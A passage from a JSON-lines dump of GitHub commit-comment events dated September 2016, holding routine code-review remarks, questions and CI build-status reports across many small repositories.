<https://github.com/CSE-CSUSB/Constitution/commit/a24f174f57cce96fcb0ef5c92f5890417f5b049f#commitcomment-19217970>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AI28HxI8iN-74DmrsRhwkQR4l46cMIElks5quyNHgaJpZM4KJhIi>\n> .\n>\n"}},"created_at":"2016-09-29T21:15:38Z"}
{"id":"4640018884","type":"CommitCommentEvent","actor":{"login":"bendlas"},"repo":{"name":"darwin/clojurescript"},"payload":{"comment":{"id":19231632,"position":41,"line":198,"path":"src/main/cljs/clojure/browser/repl.cljs","commit_id":"b7bc7377ca6ea2671629d561df741e0436fc03c9","created_at":"2016-09-29T21:16:05Z","updated_at":"2016-09-29T21:16:05Z","body":"It irks me, that only `bootstrap-if-needed!` would call back listeners.\r\nShould `bootstrap-if-needed!` be merged into `bootstrap!` whole?"}},"created_at":"2016-09-29T21:16:05Z"}
{"id":"4640024592","type":"CommitCommentEvent","actor":{"login":"hermitman"},"repo":{"name":"syed-ahmed/tensorflow"},"payload":{"comment":{"id":19231645,"position":null,"line":null,"path":null,"commit_id":"95c145b19ce0537b80368472d7daf2bbe7d03788","created_at":"2016-09-29T21:17:10Z","updated_at":"2016-09-29T21:17:10Z","body":"@syed-ahmed Hi, I read your posts on in [(https://github.com/tensorflow/tensorflow/issues/2169)], and am wondering if you know how to implement the unpooling in Tensorflow now. If this branch works, could you let me know what to do to include it into my project? Thanks,"}},"created_at":"2016-09-29T21:17:10Z"}
{"id":"4640029841","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"aleksposte/Thinknetica-ror-basic"},"payload":{"comment":{"id":19231651,"position":35,"line":118,"path":"Lesson_8/main.rb","commit_id":"efb96cec650e609e40d31ad91330b25f38584ca9","created_at":"2016-09-29T21:18:06Z","updated_at":"2016-09-29T21:18:06Z","body":"Если требуется вывести сложный текст, можно использовать технику Here Documents:\r\n\r\n```ruby\r\nputs <<~TEXT\r\n  Can you guess about this number?\r\n    number: #{Math::PI}\r\nTEXT\r\n```\r\n\r\nОграничитель `TEXT` может быть произвольным, главное чтобы в конце он был точно таким же."}},"created_at":"2016-09-29T21:18:06Z"}
{"id":"4640032988","type":"CommitCommentEvent","actor":{"login":"maxeo"},"repo":{"name":"maxeo/FMwork"},"payload":{"comment":{"id":19231657,"position":null,"line":null,"path":null,"commit_id":"31a4c69db24f8e3a52ac7f7f7f037512d0f79132","created_at":"2016-09-29T21:18:39Z","updated_at":"2016-09-29T21:18:39Z","body":"Non va bene ancora, domani correggo.\r\nPero oggi ho già dato"}},"created_at":"2016-09-29T21:18:39Z"}
{"id":"4640033411","type":"CommitCommentEvent","actor":{"login":"hansemannn"},"repo":{"name":"appcelerator/titanium_mobile"},"payload":{"comment":{"id":19231659,"position":5,"line":113,"path":"apidoc/Modules/Cloud/Cloud.yml","commit_id":"0495633077b010144ed27606353b4f700363f6be","created_at":"2016-09-29T21:18:44Z","updated_at":"2016-09-29T21:18:44Z","body":"The {{since}} key is used to define the Titanium version, not the platform-version, e.g. \r\n```yml\r\nosver: {windows:{min: \"8.0\"}}\r\n```\r\nAlthough I'm not sure if `windows` is a valid key-name there."}},"created_at":"2016-09-29T21:18:44Z"}
{"id":"4640033743","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":19231660,"position":29,"line":29,"path":"ALGORYTHMS/task1/myqueue.h","commit_id":"9c2c780e7ed25855121482024975bc7d49b5bbf2","created_at":"2016-09-29T21:18:48Z","updated_at":"2016-09-29T21:18:48Z","body":"Мне нравится код этого класса! 👍 "}},"created_at":"2016-09-29T21:18:48Z"}
{"id":"4640036893","type":"CommitCommentEvent","actor":{"login":"tatarbj"},"repo":{"name":"ec-europa/platform-dev"},"payload":{"comment":{"id":19231664,"position":175,"line":643,"path":"profiles/common/modules/custom/tmgmt_poetry/plugins/tmgmt_poetry.plugin.inc","commit_id":"bcd342074d0d21b6e25a8b03a1694830140ee309","created_at":"2016-09-29T21:19:23Z","updated_at":"2016-09-29T21:19:23Z","body":"Thanks for the recommendation Robert, i just make some remark that - even after it passes tests - could be taken account, it's not an official QA as i personally think around 11pm no one can perform it properly, just there is no dream still on my eyes and wanted to make some useful thing instead of just watching tv :) sorry if i disturbed you, hopefully all these remarks will be on your code just as kind as i would like to say them :)"}},"created_at":"2016-09-29T21:19:23Z"}
{"id":"4640038109","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":19231667,"position":37,"line":67,"path":"ALGORYTHMS/task1/queue.cpp","commit_id":"9c2c780e7ed25855121482024975bc7d49b5bbf2","created_at":"2016-09-29T21:19:37Z","updated_at":"2016-09-29T21:19:37Z","body":"Стоит ещё с `std::queue` сравнивать."}},"created_at":"2016-09-29T21:19:37Z"}
{"id":"4640039689","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"aleksposte/Thinknetica-ror-basic"},"payload":{"comment":{"id":19231673,"position":null,"line":null,"path":null,"commit_id":"efb96cec650e609e40d31ad91330b25f38584ca9","created_at":"2016-09-29T21:19:55Z","updated_at":"2016-09-29T21:19:55Z","body":"Вообще, длина строки в 80 символов это скорее рекомендация. Ясно что длинные строки читать совсем не удобно, но если у нас 90-100 символов, как правило, с этим не возникает проблем."}},"created_at":"2016-09-29T21:19:55Z"}
{"id":"4640040263","type":"CommitCommentEvent","actor":{"login":"kazarena"},"repo":{"name":"kc1116/json-gold"},"payload":{"comment":{"id":19231676,"position":null,"line":null,"path":null,"commit_id":"7714d7ce2de0b5d6f24c5bc128a1cddbf45da36d","created_at":"2016-09-29T21:20:02Z","updated_at":"2016-09-29T21:20:02Z","body":"Cheers, thank you again for looking into it."}},"created_at":"2016-09-29T21:20:02Z"}
{"id":"4640042474","type":"CommitCommentEvent","actor":{"login":"L3nn0x"},"repo":{"name":"RavenX8/osIROSE-new"},"payload":{"comment":{"id":19231682,"position":4,"line":51,"path":"src/core/include/cnetwork_asio.h","commit_id":"1fdc38bed5f7e7010ab0841ad1bc2bb22587ddd8","created_at":"2016-09-29T21:20:28Z","updated_at":"2016-09-29T21:20:28Z","body":"Oups, true"}},"created_at":"2016-09-29T21:20:28Z"}
{"id":"4640057871","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":19231721,"position":29,"line":62,"path":"ALGORYTHMS/task1/queue.cpp","commit_id":"0dc134e21cf62089754d5e9a66bd4a7a2e236c76","created_at":"2016-09-29T21:23:26Z","updated_at":"2016-09-29T21:23:26Z","body":"Typo: s/pull/pop/g"}},"created_at":"2016-09-29T21:23:26Z"}
{"id":"4640059773","type":"CommitCommentEvent","actor":{"login":"jh-bate"},"repo":{"name":"tidepool-org/blip"},"payload":{"comment":{"id":19231736,"position":null,"line":null,"path":null,"commit_id":"cb1c8849a015edc5c6daa83ab033e6b28ca29edd","created_at":"2016-09-29T21:23:49Z","updated_at":"2016-09-29T21:23:49Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [<ux: 1 dev:5 tst: 1> [blip] [device settings] Update design for Tandem pump Device Settings](https://trello.com/c/tbc9evMS/3-ux-1-dev-5-tst-1-blip-device-settings-update-design-for-tandem-pump-device-settings)"}},"created_at":"2016-09-29T21:23:49Z"}
{"id":"4640066365","type":"CommitCommentEvent","actor":{"login":"lindalinda12"},"repo":{"name":"lindalinda12/Java1"},"payload":{"comment":{"id":19231953,"position":null,"line":null,"path":null,"commit_id":"f7e40cc4cf2a77eb69fd340c3c8927b60a2a43c0","created_at":"2016-09-29T21:25:01Z","updated_at":"2016-09-29T21:25:01Z","body":"N/A"}},"created_at":"2016-09-29T21:25:01Z"}
{"id":"4640068147","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"aleksposte/Thinknetica-ror-basic"},"payload":{"comment":{"id":19231969,"position":80,"line":238,"path":"Lesson_8/main.rb","commit_id":"5e4396a9ab520aed3d63bc2f879165693ceb7482","created_at":"2016-09-29T21:25:21Z","updated_at":"2016-09-29T21:25:21Z","body":"Здесь должно быть `selected_train`?"}},"created_at":"2016-09-29T21:25:21Z"}
{"id":"4640074180","type":"CommitCommentEvent","actor":{"login":"netlooker"},"repo":{"name":"ec-europa/platform-dev"},"payload":{"comment":{"id":19232019,"position":175,"line":643,"path":"profiles/common/modules/custom/tmgmt_poetry/plugins/tmgmt_poetry.plugin.inc","commit_id":"bcd342074d0d21b6e25a8b03a1694830140ee309","created_at":"2016-09-29T21:26:31Z","updated_at":"2016-09-29T21:26:31Z","body":"No problem, you are not disturbing me it is just not yet finished feature and most probably I will have more remarks form the Core Team colleagues during internal QA so there is a high probability that the code will look differently. Anyway thanks for your time and remarks."}},"created_at":"2016-09-29T21:26:31Z"}
{"id":"4640078874","type":"CommitCommentEvent","actor":{"login":"syed-ahmed"},"repo":{"name":"syed-ahmed/tensorflow"},"payload":{"comment":{"id":19232102,"position":null,"line":null,"path":null,"commit_id":"95c145b19ce0537b80368472d7daf2bbe7d03788","created_at":"2016-09-29T21:27:20Z","updated_at":"2016-09-29T21:27:20Z","body":"Hey @hermitman. So I didn't get a chance to continue working on this after my last post in that issue (don't have access to a cuda enabled computer at the moment). But I think my problem is in line number 223 and 246 for the max unpooling op. If you wanna give it a shot, that'll be awesome. The last error I got was a 'aligning error' on that loop. And I think that happens because the loop is not producing the correct behaviour of an unpooling op. So that's where this branch is stuck right now. Need a way to debug the current behaviour. One suggestion girving made was putting print statements and debugging... "}},"created_at":"2016-09-29T21:27:20Z"}
{"id":"4640085422","type":"CommitCommentEvent","actor":{"login":"guilhermejcgois"},"repo":{"name":"Richsan/Krakacomp"},"payload":{"comment":{"id":19232164,"position":null,"line":null,"path":null,"commit_id":"394f913559e529159d85604a57ef1086410a93b7","created_at":"2016-09-29T21:28:38Z","updated_at":"2016-09-29T21:28:38Z","body":"É estranho que nos arquivos gerados não tem nada, tentei procurar o problema mas não encontrei."}},"created_at":"2016-09-29T21:28:38Z"}
{"id":"4640085465","type":"CommitCommentEvent","actor":{"login":"Naereen"},"repo":{"name":"LaurentClaessens/mazhe"},"payload":{"comment":{"id":19232165,"position":null,"line":null,"path":null,"commit_id":"0f5dbc1f33c91720b978ac9c70af3b6639b73848","created_at":"2016-09-29T21:28:38Z","updated_at":"2016-09-29T21:28:38Z","body":":+1: "}},"created_at":"2016-09-29T21:28:38Z"}
{"id":"4640088614","type":"CommitCommentEvent","actor":{"login":"dsomel21"},"repo":{"name":"werein/react"},"payload":{"comment":{"id":19232176,"position":null,"line":null,"path":null,"commit_id":"5370c3940aac0deec51b35c110a368008bee84dc","created_at":"2016-09-29T21:29:14Z","updated_at":"2016-09-29T21:29:14Z","body":"Yeah I'm sure that's exactly it. You can just say you don't know instead is giving attitude. LOL \"I'll not\". And I was initially treating you with respect;  I just got confused with the goal of this repo.\n :)"}},"created_at":"2016-09-29T21:29:14Z"}
{"id":"4640089948","type":"CommitCommentEvent","actor":{"login":"alexsmithRTI"},"repo":{"name":"RTICWDT/evaluation-engine-website"},"payload":{"comment":{"id":19232180,"position":null,"line":null,"path":null,"commit_id":"cbc1fc701a60cc098cba98ae3e5cb6257b229ebb","created_at":"2016-09-29T21:29:30Z","updated_at":"2016-09-29T21:29:30Z","body":"accidentally wrote 'proficiency' in commit comment, meant 'treatment'"}},"created_at":"2016-09-29T21:29:30Z"}
{"id":"4640092334","type":"CommitCommentEvent","actor":{"login":"rickyc"},"repo":{"name":"lebra770/Nano-Hackers-Fall-Api-2016"},"payload":{"comment":{"id":19232185,"position":null,"line":null,"path":null,"commit_id":"24935b57aa5cbd53088ff03956bd8c2a662d4152","created_at":"2016-09-29T21:30:00Z","updated_at":"2016-09-29T21:30:00Z","body":"It should be one table not multiple. "}},"created_at":"2016-09-29T21:30:00Z"}
{"id":"4640096317","type":"CommitCommentEvent","actor":{"login":"roman-timoshenko"},"repo":{"name":"usnaked/tutorial"},"payload":{"comment":{"id":19232190,"position":15,"line":19,"path":"src/main/java/Sorting.java","commit_id":"90cd3be680af446dcb198d617b6b08adbfd25d2f","created_at":"2016-09-29T21:30:45Z","updated_at":"2016-09-29T21:30:45Z","body":"Не надо создавать генератор внутри функции."}},"created_at":"2016-09-29T21:30:45Z"}
{"id":"4640096829","type":"CommitCommentEvent","actor":{"login":"roman-timoshenko"},"repo":{"name":"usnaked/tutorial"},"payload":{"comment":{"id":19232191,"position":21,"line":23,"path":"src/main/java/Sorting.java","commit_id":"90cd3be680af446dcb198d617b6b08adbfd25d2f","created_at":"2016-09-29T21:30:50Z","updated_at":"2016-09-29T21:30:50Z","body":"minValue = 7, maxValue = 8\r\nКакое минимальное и максимальное значение сгенерирует этот код?"}},"created_at":"2016-09-29T21:30:50Z"}
{"id":"4640097439","type":"CommitCommentEvent","actor":{"login":"roman-timoshenko"},"repo":{"name":"usnaked/tutorial"},"payload":{"comment":{"id":19232192,"position":27,"line":29,"path":"src/main/java/Sorting.java","commit_id":"90cd3be680af446dcb198d617b6b08adbfd25d2f","created_at":"2016-09-29T21:30:57Z","updated_at":"2016-09-29T21:30:57Z","body":"Переменные надо объявлять в самой минимальной зоне видимости."}},"created_at":"2016-09-29T21:30:57Z"}
{"id":"4640097580","type":"CommitCommentEvent","actor":{"login":"carlphilipp"},"repo":{"name":"corelema/Rainbow"},"payload":{"comment":{"id":19232194,"position":8,"line":6,"path":"gradle/wrapper/gradle-wrapper.properties","commit_id":"de3fc6900120a5fe9d7c1d56c18252916229e75f","created_at":"2016-09-29T21:30:59Z","updated_at":"2016-09-29T21:30:59Z","body":"Yeah not sure it's officially supported by android studio, but it works"}},"created_at":"2016-09-29T21:30:59Z"}
{"id":"4640099788","type":"CommitCommentEvent","actor":{"login":"roman-timoshenko"},"repo":{"name":"usnaked/tutorial"},"payload":{"comment":{"id":19232197,"position":33,"line":35,"path":"src/main/java/Sorting.java","commit_id":"90cd3be680af446dcb198d617b6b08adbfd25d2f","created_at":"2016-09-29T21:31:25Z","updated_at":"2016-09-29T21:31:25Z","body":"Вот тут надо объявлять переменную buffer."}},"created_at":"2016-09-29T21:31:25Z"}
{"id":"4640102889","type":"CommitCommentEvent","actor":{"login":"roman-timoshenko"},"repo":{"name":"usnaked/tutorial"},"payload":{"comment":{"id":19232205,"position":30,"line":32,"path":"src/main/java/Sorting.java","commit_id":"90cd3be680af446dcb198d617b6b08adbfd25d2f","created_at":"2016-09-29T21:32:00Z","updated_at":"2016-09-29T21:32:00Z","body":"Переменную n надо объявлять прямо в цикле for.\r\n\r\nfor (int n = arrayToSort.length ..."}},"created_at":"2016-09-29T21:32:00Z"}
{"id":"4640103358","type":"CommitCommentEvent","actor":{"login":"darwin"},"repo":{"name":"darwin/clojurescript"},"payload":{"comment":{"id":19232208,"position":54,"line":211,"path":"src/main/cljs/clojure/browser/repl.cljs","commit_id":"b7bc7377ca6ea2671629d561df741e0436fc03c9","created_at":"2016-09-29T21:32:06Z","updated_at":"2016-09-29T21:32:06Z","body":"I didn't want to touch the original function. For people who depend on exact behaviour. They would use bootstrap! instead of bootstrap and be fine.\r\n\r\nThere may be cases where you would want to call it multiple times for some reason."}},"created_at":"2016-09-29T21:32:06Z"}
{"id":"4640107810","type":"CommitCommentEvent","actor":{"login":"dany323"},"repo":{"name":"dany323/test"},"payload":{"comment":{"id":19232216,"position":null,"line":null,"path":null,"commit_id":"1167978aa01685d1bf7acf4924c16807fa7cdec3","created_at":"2016-09-29T21:33:00Z","updated_at":"2016-09-29T21:33:00Z","body":"hhh"}},"created_at":"2016-09-29T21:33:00Z"}
{"id":"4640111679","type":"CommitCommentEvent","actor":{"login":"roman-timoshenko"},"repo":{"name":"usnaked/tutorial"},"payload":{"comment":{"id":19232221,"position":26,"line":28,"path":"src/main/java/Sorting.java","commit_id":"90cd3be680af446dcb198d617b6b08adbfd25d2f","created_at":"2016-09-29T21:33:47Z","updated_at":"2016-09-29T21:33:47Z","body":"Что такое increase? Не используется же нигде."}},"created_at":"2016-09-29T21:33:47Z"}
{"id":"4640119982","type":"CommitCommentEvent","actor":{"login":"MajorPlayz"},"repo":{"name":"Falkirks/SimplePortals"},"payload":{"comment":{"id":19232236,"position":null,"line":null,"path":null,"commit_id":"ed5cc806d8a5f69927c0241a20cf4bf26d0cfb63","created_at":"2016-09-29T21:35:30Z","updated_at":"2016-09-29T21:35:30Z","body":"?"}},"created_at":"2016-09-29T21:35:30Z"}
{"id":"4640120547","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19232239,"position":null,"line":null,"path":null,"commit_id":"efce78bc946ce268ca9ef75a12d4f022cd1c7d4c","created_at":"2016-09-29T21:35:37Z","updated_at":"2016-09-29T21:35:37Z","body":"EMS (brianlball) - Win64-Windows-7-VisualStudio-12: OK (2312 of 2497 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-efce78bc946ce268ca9ef75a12d4f022cd1c7d4c-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-efce78bc946ce268ca9ef75a12d4f022cd1c7d4c-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.59%25-yellow.svg)</a> \n"}},"created_at":"2016-09-29T21:35:37Z"}
{"id":"4640123251","type":"CommitCommentEvent","actor":{"login":"christopherstyles"},"repo":{"name":"bletchley/transmuxer"},"payload":{"comment":{"id":19232252,"position":11,"line":34,"path":"lib/transmuxer/transmuxable.rb","commit_id":"4c29e54b51bd9990e33410827c551d28df74018f","created_at":"2016-09-29T21:36:09Z","updated_at":"2016-09-29T21:36:09Z","body":"@codegoblin I’m getting an error when running specs on this – where/how is `caption_file_url` set? Would it make sense to set an `attr_accessor` for it? Doing so makes the test pass, but I’m unsure of how you’re setting it in your application."}},"created_at":"2016-09-29T21:36:09Z"}
{"id":"4640123869","type":"CommitCommentEvent","actor":{"login":"darwin"},"repo":{"name":"darwin/clojurescript"},"payload":{"comment":{"id":19232253,"position":41,"line":198,"path":"src/main/cljs/clojure/browser/repl.cljs","commit_id":"b7bc7377ca6ea2671629d561df741e0436fc03c9","created_at":"2016-09-29T21:36:15Z","updated_at":"2016-09-29T21:36:15Z","body":"I didn't want to touch the original function. For people who depend on exact behaviour. They would use bootstrap! instead of bootstrap and be fine.\r\n\r\nThere may be cases where you would want to call it multiple times for some reason."}},"created_at":"2016-09-29T21:36:15Z"}
{"id":"4640126572","type":"CommitCommentEvent","actor":{"login":"MajorPlayz"},"repo":{"name":"Falkirks/SimplePortals"},"payload":{"comment":{"id":19232262,"position":null,"line":null,"path":null,"commit_id":"ed5cc806d8a5f69927c0241a20cf4bf26d0cfb63","created_at":"2016-09-29T21:36:44Z","updated_at":"2016-09-29T21:36:44Z","body":"```\r\nLol :D\r\nDude this is already php7 pretty much just bump the api XD\r\n```"}},"created_at":"2016-09-29T21:36:44Z"}
{"id":"4640129249","type":"CommitCommentEvent","actor":{"login":"allan-simon"},"repo":{"name":"jean553/aiohttp-s3-files-manager"},"payload":{"comment":{"id":19232272,"position":23,"line":23,"path":"aiohttp-s3-files-manager/handle_get_file.py","commit_id":"327d4aa5766c468f86292c38ac7e0c41f4e71021","created_at":"2016-09-29T21:37:18Z","updated_at":"2016-09-29T21:37:18Z","body":"be careful, you're asynchronous, yes, but not in the way you want,  because here basically you will asynchronously load 1gigabyte of your potentially super large file, which will explode your RAM consumption if you treat several request like that (especially as now you're asynchronous you can load your RAM from several request at the same time, so here async is becoming your ennemy ) \r\n\r\nwhat you actually want is stream as the data gets in , so at a given point in time you're only holding 1 line of data "}},"created_at":"2016-09-29T21:37:18Z"}
{"id":"4640134181","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19232291,"position":null,"line":null,"path":null,"commit_id":"24455d236c6c1724cdc29b6c9add2983770513db","created_at":"2016-09-29T21:38:18Z","updated_at":"2016-09-29T21:38:18Z","body":"MakeWebKitWork (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-24455d236c6c1724cdc29b6c9add2983770513db-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-24455d236c6c1724cdc29b6c9add2983770513db-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-29T21:38:18Z"}
{"id":"4640135553","type":"CommitCommentEvent","actor":{"login":"karasu"},"repo":{"name":"Antergos/Cnchi"},"payload":{"comment":{"id":19232297,"position":null,"line":null,"path":null,"commit_id":"e49e60ff54cc79001defa6bbe97c640ee992c51e","created_at":"2016-09-29T21:38:34Z","updated_at":"2016-09-29T21:38:34Z","body":"OK, it seems this way is working :+1: "}},"created_at":"2016-09-29T21:38:34Z"}
{"id":"4640139314","type":"CommitCommentEvent","actor":{"login":"allan-simon"},"repo":{"name":"jean553/aiohttp-s3-files-manager"},"payload":{"comment":{"id":19232311,"position":23,"line":23,"path":"aiohttp-s3-files-manager/handle_get_file.py","commit_id":"327d4aa5766c468f86292c38ac7e0c41f4e71021","created_at":"2016-09-29T21:39:20Z","updated_at":"2016-09-29T21:39:20Z","body":"i.e going from  current \r\n\r\n```\r\n1. i request all the data\r\n... [other request can be treated]\r\n2. i sent all the data at once\r\n```\r\n\r\nto \r\n```\r\n1. I request the file\r\n2. I wait for one line (and only one line)\r\n... other request can be treated\r\n3. my one line finally arrive, i treat it / transform it\r\n4. I send my transformed one line \r\n5. go back to 2)\r\n```"}},"created_at":"2016-09-29T21:39:20Z"}
{"id":"4640140716","type":"CommitCommentEvent","actor":{"login":"chhamajain"},"repo":{"name":"lithiumtech/lithium-sdk"},"payload":{"comment":{"id":19232314,"position":null,"line":null,"path":null,"commit_id":"0e3d7cf21ab5336475da27b865b7e08aa73e2486","created_at":"2016-09-29T21:39:36Z","updated_at":"2016-09-29T21:39:36Z","body":"reviewed"}},"created_at":"2016-09-29T21:39:36Z"}
{"id":"4640146429","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19232329,"position":null,"line":null,"path":null,"commit_id":"24455d236c6c1724cdc29b6c9add2983770513db","created_at":"2016-09-29T21:40:47Z","updated_at":"2016-09-29T21:40:47Z","body":"MakeWebKitWork (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-24455d236c6c1724cdc29b6c9add2983770513db-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-24455d236c6c1724cdc29b6c9add2983770513db-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-29T21:40:47Z"}
{"id":"4640152465","type":"CommitCommentEvent","actor":{"login":"mauritsvanrees"},"repo":{"name":"plone/plone.cachepurging"},"payload":{"comment":{"id":19232343,"position":24,"line":237,"path":"plone/cachepurging/tests/test_utils.py","commit_id":"a0604973a04802b8a0d618f2f49ae43f207f0000","created_at":"2016-09-29T21:42:04Z","updated_at":"2016-09-29T21:42:04Z","body":"I have replaced the remaining adapts with adapters now."}},"created_at":"2016-09-29T21:42:04Z"}
{"id":"4640153320","type":"CommitCommentEvent","actor":{"login":"Desnoo"},"repo":{"name":"proxer/ProxerLibAndroid"},"payload":{"comment":{"id":19232348,"position":null,"line":null,"path":null,"commit_id":"6ca7612e584355af6db0bf4a55838997af70b3bd","created_at":"2016-09-29T21:42:15Z","updated_at":"2016-09-29T21:42:15Z","body":"Alright!"}},"created_at":"2016-09-29T21:42:15Z"}
{"id":"4640159247","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19232364,"position":null,"line":null,"path":null,"commit_id":"fdf1fc1e6bc345b276d02b594f7a4bd3655daa80","created_at":"2016-09-29T21:43:29Z","updated_at":"2016-09-29T21:43:29Z","body":"os_2_0_develop (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fdf1fc1e6bc345b276d02b594f7a4bd3655daa80-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fdf1fc1e6bc345b276d02b594f7a4bd3655daa80-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-29T21:43:29Z"}
{"id":"4640164813","type":"CommitCommentEvent","actor":{"login":"liwai20120102"},"repo":{"name":"liwai20120102/hello-world"},"payload":{"comment":{"id":19232380,"position":null,"line":null,"path":null,"commit_id":"ce10dd8629e2f8bd8bd6d6613d02f9a2e6297fee","created_at":"2016-09-29T21:44:40Z","updated_at":"2016-09-29T21:44:40Z","body":"liwai"}},"created_at":"2016-09-29T21:44:40Z"}
{"id":"4640165767","type":"CommitCommentEvent","actor":{"login":"jittya"},"repo":{"name":"ImarahTechTEST/TestRepository"},"payload":{"comment":{"id":19232383,"position":5,"line":95,"path":"pthread.h","commit_id":"40ca2e41ad59f783febadd4c8776b92d8f585434","created_at":"2016-09-29T21:44:54Z","updated_at":"2016-09-29T21:44:54Z","body":"Please remove this line @ImarahTechTEST/mobileteam "}},"created_at":"2016-09-29T21:44:54Z"}
{"id":"4640167561","type":"CommitCommentEvent","actor":{"login":"jittya"},"repo":{"name":"ImarahTechTEST/TestRepository"},"payload":{"comment":{"id":19232391,"position":5,"line":95,"path":"pthread.h","commit_id":"40ca2e41ad59f783febadd4c8776b92d8f585434","created_at":"2016-09-29T21:45:16Z","updated_at":"2016-09-29T21:45:16Z","body":"Okey sounds good"}},"created_at":"2016-09-29T21:45:16Z"}
{"id":"4640171338","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19232399,"position":null,"line":null,"path":null,"commit_id":"fdf1fc1e6bc345b276d02b594f7a4bd3655daa80","created_at":"2016-09-29T21:46:02Z","updated_at":"2016-09-29T21:46:02Z","body":"os_2_0_develop (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fdf1fc1e6bc345b276d02b594f7a4bd3655daa80-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fdf1fc1e6bc345b276d02b594f7a4bd3655daa80-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-29T21:46:02Z"}
{"id":"4640174910","type":"CommitCommentEvent","actor":{"login":"RMBLRX"},"repo":{"name":"rapidExpedition/theExpeditionarium"},"payload":{"comment":{"id":19232410,"position":null,"line":null,"path":null,"commit_id":"4878bcd66852de71551d21a044747bbb43cd99a9","created_at":"2016-09-29T21:46:48Z","updated_at":"2016-09-29T21:46:48Z","body":"Yeah, lanyon doesn't seem to be recognizing headers.  I'm not sure if it's prose.io's fault or the configuration."}},"created_at":"2016-09-29T21:46:48Z"}
{"id":"4640178424","type":"CommitCommentEvent","actor":{"login":"Gemlee"},"repo":{"name":"Gemlee/tarjeta1"},"payload":{"comment":{"id":19232417,"position":null,"line":null,"path":null,"commit_id":"44cbc4f56680d3d9c46ade1174f5a0498a95bd40","created_at":"2016-09-29T21:47:33Z","updated_at":"2016-09-29T21:47:33Z","body":"dfasdasdas"}},"created_at":"2016-09-29T21:47:33Z"}
{"id":"4640182235","type":"CommitCommentEvent","actor":{"login":"aekeus"},"repo":{"name":"brave/vault-updater"},"payload":{"comment":{"id":19232425,"position":null,"line":null,"path":null,"commit_id":"dc2caf0f275d4dfbb522685dd436678db616feb9","created_at":"2016-09-29T21:48:21Z","updated_at":"2016-09-29T21:48:21Z","body":"++ looks good cc @bbondy "}},"created_at":"2016-09-29T21:48:21Z"}
{"id":"4640183983","type":"CommitCommentEvent","actor":{"login":"thijstriemstra"},"repo":{"name":"katspaugh/wavesurfer.js"},"payload":{"comment":{"id":19232431,"position":null,"line":null,"path":null,"commit_id":"4898adba12e95793ef280bac476ee799005894ed","created_at":"2016-09-29T21:48:43Z","updated_at":"2016-09-29T21:48:43Z","body":"@jasminegrosso can you also add an entry to the changelog for this change?"}},"created_at":"2016-09-29T21:48:43Z"}
{"id":"4640185410","type":"CommitCommentEvent","actor":{"login":"bitseater"},"repo":{"name":"bitseater/gfactura"},"payload":{"comment":{"id":19232434,"position":null,"line":null,"path":null,"commit_id":"eabed14d1bde0ddc0d9ca3d2e1fa3c6c0d1372a9","created_at":"2016-09-29T21:49:00Z","updated_at":"2016-09-29T21:49:00Z","body":"Actualizando estilo y estructura básica."}},"created_at":"2016-09-29T21:49:00Z"}
